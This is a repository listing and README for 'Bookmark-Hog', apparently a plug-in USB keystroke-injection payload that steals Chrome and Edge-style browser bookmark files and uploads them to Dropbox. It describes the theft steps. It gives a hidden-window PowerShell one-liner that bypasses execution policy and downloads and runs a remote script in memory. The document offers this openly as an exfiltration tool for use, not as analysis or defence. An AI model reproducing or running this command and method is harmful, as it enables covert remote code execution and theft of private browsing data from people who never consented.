omg-payloads/payloads/library/exfiltration/Bookmark-Hog
atomic 4cb1703a9f
Update README.md
2022-08-08 22:09:31 -04:00
..
BH.ps1 New payload - Bookmark-Hog 2022-08-08 22:06:40 -04:00
README.md Update README.md 2022-08-08 22:09:31 -04:00
payload.txt New payload - Bookmark-Hog 2022-08-08 22:06:40 -04:00

README.md

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments

Bookmark-Hog

A payload to exfiltrate bookmarks of the 2 most popular browsers

Description

This payload will enumerate through the browser directories, looking for the file that stores the bookmark history These files will be saved to the temp directory Finally dropbox will be used to exfiltrate the files to cloud storage

Getting Started

Dependencies

  • DropBox or other file sharing service - Your Shared link for the intended file
  • Windows 10,11

(back to top)

Executing program

  • Plug in your device
  • Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl

(back to top)

Contributing

All contributors names will be listed here

atomiczsec

I am Jakoby

(back to top)

Version History

  • 0.1
    • Initial Release

(back to top)

Contact

📱 My Socials 📱

C#
YouTube
Python
Twitter
Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

Acknowledgments

(back to top)